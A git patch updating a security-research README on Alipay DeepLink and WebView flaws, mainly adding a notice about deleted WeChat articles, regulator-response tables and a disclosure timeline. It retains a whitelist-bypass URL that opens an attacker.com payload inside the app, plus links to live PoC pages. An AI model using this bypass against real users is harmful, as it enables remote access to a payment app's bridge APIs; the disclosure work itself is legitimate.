From 2a8ba8e369b10dba7946edf4a1b69d52129d9c5b Mon Sep 17 00:00:00 2001 From: feng Date: Sun, 15 Mar 2026 21:18:02 +0800 Subject: [PATCH] Update README: censorship notice corrected, all WeChat links marked DELETED - Fix: March 15 deletion has NO identified complainant (anonymous "related complaint") - Fix: Clearly distinguish March 11 named complaint (rejected) vs March 15 anonymous (deleted) - Add: Censorship analysis article link (innora.ai/zfb/article_censorship.html) - Add: Full regulatory response table (38+ institutions, 16 countries) - Add: Twitter thread link (@met3or) - Mark: All 4 WeChat article links as DELETED with strikethrough - Update: Timeline with March 15 censorship event - Update: Mirrors table showing WeChat as DELETED Co-Authored-By: Claude --- README.md | 172 ++++++++++++++++++++++++++++++------------------------ 1 file changed, 96 insertions(+), 76 deletions(-) diff --git a/README.md b/README.md index bce91b0..6f03df7 100644 --- a/README.md +++ b/README.md @@ -2,20 +2,36 @@ **17 Verified Vulnerabilities | 3 Devices | 308 Server Log Entries | 6 CVEs Applied** -> **⚠️ Official Update Channels**: All updates are published exclusively at: -> 1. **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/) -> 2. **WeChat**: Official Account **AI-security-innora** +--- + +> ## ⚠️ CENSORSHIP UPDATE — 2026-03-15 > -> Content from any other source is not authorized by our team. +> **All 4 WeChat articles have been forcibly deleted.** +> +> The deletion notices state only: *"Received related complaint. Determined to violate the Cybersecurity Law."* Basis: *"related laws and regulations."* +> +> **No complainant identified. No specific law article cited. No appeal channel provided.** +> +> 4 days earlier (March 11), a named complaint by Beijing Geyun Law Firm citing "reputation infringement" was **reviewed and rejected** by WeChat — the platform found it did not constitute infringement. This time, an anonymous complaint succeeded where the named one failed. +> +> Meanwhile, the same research is independently verified by Packet Storm (#217089), accepted by MITRE (6 CVEs, Ticket #2005801), and under investigation by 16+ countries' regulators. +> +> ![Deletion Notice](wechat_censored_1.jpeg) +> +> **Full censorship analysis (bilingual EN/CN):** [innora.ai/zfb/article_censorship.html](https://innora.ai/zfb/article_censorship.html) -## WeChat Articles +--- -| Tag | Title | Link | -|-----|-------|------| -| 🆕 NEW | 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 | [Read](https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw) | -| 🔥 HOT | 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 | [Read](https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg) | -| ⚖️ LEGAL | 支付宝安全研究遭律师函投诉 — 零次提及"支付宝"如何构成"商誉侵权"? | [Read](https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw) | -| 📱 ORIGINAL | 位置被秒偷!10多亿人每天在用的国民支付应用,17个「正常功能」细思极恐! | [Read](https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q) | +## WeChat Articles — ALL DELETED + +| Status | Title | Original Link | +|--------|-------|---------------| +| ~~DELETED~~ | 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 | ~~[Dead Link](https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw)~~ | +| ~~DELETED~~ | 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 | ~~[Dead Link](https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg)~~ | +| ~~DELETED~~ | 支付宝安全研究遭律师函投诉 — 零次提及"支付宝"如何构成"商誉侵权"? | ~~[Dead Link](https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw)~~ | +| ~~DELETED~~ | 位置被秒偷!10多亿人每天在用的国民支付应用,17个「正常功能」细思极恐! | ~~[Dead Link](https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q)~~ | + +**Archived versions**: [innora.ai/zfb/](https://innora.ai/zfb/) | This repository ## Critical Finding: Whitelist Bypass (CVSS 9.3) @@ -25,33 +41,56 @@ https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://attacker.com/payload.html ``` -- **No developer permissions required** — No Alipay Open Platform registration, no Mini Program credentials, no approval -- **Transforms all vulnerabilities** — Without this bypass, issues are LAN-only; with it, anyone can attack remotely against 1B+ users -- **Vendor acknowledged severity** — Ant Group stated "If you can bypass our whitelist, that would be serious." Bypass achieved in under 2 minutes. Vendor still refuses to patch, calling it "normal functionality" -- **6 CVEs applied** via MITRE (Ticket #2005801), including this bypass as highest-severity (CWE-601 + CWE-939) +- **No developer permissions required** — No registration, no credentials, no approval +- **Transforms all vulnerabilities** — Without this bypass, issues are LAN-only; with it, anyone can attack 1B+ users remotely +- **Vendor acknowledged severity** — During a 23-minute recorded call, Ant Group's security lead stated: "If you can bypass our whitelist, that would be serious." Bypass achieved in under 2 minutes. Vendor refuses to patch, calling it "normal functionality" +- **6 CVEs applied** via MITRE (Ticket #2005801), CWE-601 + CWE-939 ## Full Report -- **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/) -- **GitHub**: This repository +- **Technical Report**: [innora.ai/zfb/](https://innora.ai/zfb/) +- **Censorship Analysis**: [innora.ai/zfb/article_censorship.html](https://innora.ai/zfb/article_censorship.html) +- **Packet Storm Advisory**: #217089 ## Global Regulatory Response -Reported to ~160 agencies across 22 countries. Active investigations by: -- **Apple Product Security** — Active investigation -- **Google Play** — Policy violation investigation -- **MITRE CVE** — 6 CVEs applied (Ticket #2005801) -- **CSSF Luxembourg** — 4 departments confirmed receipt, ICT Risk Supervision noted contents -- **Singapore PDPC** — Formal data protection investigation -- **HKMA Hong Kong** — SVF licence compliance inquiry -- **CIRCL Luxembourg** — Contacting Alibaba SRC on our behalf -- **Packet Storm Security** — Advisory published (ID 217089) +Reported to ~160 agencies across 22 countries. **38+ institutions responded**: -## Summary +| Institution | Country | Status | +|-------------|---------|--------| +| **Apple Product Security** | US | Active investigation | +| **Google Play** | US | Policy violation review | +| **MITRE CVE** | US | 6 CVEs accepted (Ticket #2005801) | +| **Packet Storm Security** | US | Advisory #217089 published | +| **CSSF Luxembourg** | EU | Whistleblowing case CSSFWB-2026-080 | +| **HKMA** | Hong Kong | SVF complaint filed | +| **PDPC** | Singapore | Privacy investigation opened | +| **FCA** | UK | Whistleblowing confirmed | +| **OAIC** | Australia | Intake confirmed | +| **EDPB** | EU | Cross-border complaint confirmed | +| **ANSSI** | France | Confirmed, forwarded | +| **CIRCL** | Luxembourg | Case #4782984, contacting Alibaba SRC | +| **FMA** | New Zealand | Confirmed, evaluating | +| **OJK** | Indonesia | Responded with follow-up | +| **Datatilsynet** | Denmark | Confirmed receipt | +| **NCSC** | UK | Confirmed receipt | -This repository documents a comprehensive security research project that uncovered **17 security vulnerabilities** in Alipay's DeepLink URI scheme (`alipays://`) and its Nebula WebView container. +## The Censorship Pattern -### Key Findings +``` +Feb 25 - Mar 7 Private disclosure (4 rounds + 23-min recorded call) +Mar 10 Vendor: "normal functionality" — refuses to patch +Mar 11 18:16 Public disclosure on innora.ai/zfb/ +Mar 11 22:45 Beijing Geyun Law Firm complaint → REJECTED by WeChat +Mar 12 Packet Storm #217089 published, 6 CVEs at MITRE +Mar 12-14 189 emails → 22 countries → 38+ responses +Mar 15 Anonymous complaint → ALL 4 ARTICLES DELETED + No complainant. No specific law. No appeal. +``` + +**The same content exists lawfully on Packet Storm, GitHub, and innora.ai — deleted only on Chinese platforms.** + +## Key Findings | Severity | Count | Examples | |----------|-------|---------| @@ -75,76 +114,57 @@ Attacker crafts URL (NO developer permissions needed) - Samsung Galaxy S25 Ultra (Android 15, New Zealand) - Redmi 12 (Android 14, Malaysia) -- iPhone 16 Pro (iOS 18.3, China) +- iPhone 16 Pro (iOS 18.3, China — tested by vendor's own security lead) ## Live PoC (Read-Only Demo) > **No data is collected or transmitted.** All results display locally only. - [Trigger Page](https://innora.ai/zfb/poc/trigger.html) — Simulates attacker distribution page -- [JSBridge PoC](https://innora.ai/zfb/poc/verify.html) — Demonstrates API access from external page +- [JSBridge PoC](https://innora.ai/zfb/poc/verify.html) — Demonstrates API access - [Chain WebView](https://innora.ai/zfb/poc/chain.html) — Proves chained pages retain bridge access ## Responsible Disclosure Timeline | Date | Action | |------|--------| -| 2026-02-25 | Initial report sent to Ant Group SRC (TLS/SSL findings) | -| 2026-03-07 | Full report V3 sent with 17 vulnerabilities + 308 log entries | -| 2026-03-10 | Ant Group response: "These are normal features" (正常功能) | -| 2026-03-11 | Public disclosure after vendor declined to acknowledge | -| 2026-03-11 | Ant Group's law firm filed WeChat complaint (dismissed by platform) | -| 2026-03-12 | Packet Storm Security published advisory (ID 217089) | -| 2026-03-12 | 6 CVE IDs applied via MITRE (Ticket #2005801) | -| 2026-03-12~14 | ~170 emails sent to ~160 regulatory agencies across 22 countries | -| 2026-03-13 | HKMA, PDPC, CSSF, Apple, Google, CIRCL confirmed receipt/investigation | -| 2026-03-14 | Whitelist bypass (CVSS 9.3) highlighted as master key finding | - -## Repository Structure - -``` -├── index.html # Full bilingual (CN/EN) research blog -├── rebuttal.html # Legal rebuttal to lawyer's complaint -├── wechat_article.html # WeChat public account article -├── poc/ -│ ├── trigger.html # Attack trigger simulation page -│ ├── verify.html # JSBridge exploitation PoC -│ └── chain.html # Chain WebView demonstration -├── review_kimi.md # Kimi K2 cross-validation review -├── review_sonnet.md # Sonnet review -├── review_summary.md # Review summary -└── README.md # This file -``` - -## Evidence - -- **308 server exfiltration log entries** (JSONL format, not included in public repo) -- **42 real-device screenshots** (not included in public repo) -- Full evidence available upon request: feng@innora.ai - -## Legal Disclaimer - -This research is conducted for **educational and security improvement purposes only**. All testing was performed on accounts owned by the researcher. No unauthorized access to third-party accounts or data occurred. - -The PoC pages are **read-only demonstrations** with all data exfiltration endpoints disabled. They only display results locally in the browser. +| 2026-02-25 | Initial report sent to Ant Group SRC | +| 2026-03-07 | Full report V3: 17 vulnerabilities + 308 log entries | +| 2026-03-07 | 23-min call with vendor security lead (recorded) | +| 2026-03-10 | Vendor: "normal functionality" | +| 2026-03-11 | Public disclosure | +| 2026-03-11 | Beijing Geyun Law Firm complaint → **rejected by WeChat** | +| 2026-03-12 | Packet Storm #217089 published | +| 2026-03-12 | 6 CVEs applied via MITRE (Ticket #2005801) | +| 2026-03-12~14 | 189 emails → 22 countries → 38+ responses | +| **2026-03-15** | **ALL 4 articles deleted — anonymous complaint, no appeal** | +| 2026-03-15 | Censorship analysis published | ## Mirrors & Archives -To prevent single-point deletion, this research is archived at multiple locations: +| Location | Status | +|----------|--------| +| **[innora.ai/zfb/](https://innora.ai/zfb/)** | Active | +| **GitHub** (this repo) | Active | +| **Packet Storm #217089** | Permanently archived | +| ~~WeChat~~ | **DELETED** (2026-03-15) | -- **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/) -- **GitHub**: [https://github.com/sgInnora/alipay-deeplink-research](https://github.com/sgInnora/alipay-deeplink-research) +**Fork this repository as backup.** -If any mirror is taken down, please check the other locations. +## Evidence -**Readers are encouraged to fork this repository as backup.** +- **308 server exfiltration log entries** (JSONL format) +- **42 real-device screenshots** +- **Deletion notice screenshots**: `wechat_censored_1.jpeg`, `wechat_censored_2.jpeg` +- Full evidence available: feng@innora.ai ## Contact -- **Researcher**: Innora AI Security Research Team +- **Researcher**: Jiqiang Feng — Innora AI Security Research - **Email**: feng@innora.ai - **Website**: [innora.ai](https://innora.ai) +- **Twitter**: [@met3or](https://x.com/met3or/status/2033155342427967558) --- -*This research follows responsible disclosure practices. The vendor was given adequate time to respond before public disclosure.* +*This research follows ISO/IEC 29147:2018 responsible disclosure practices.*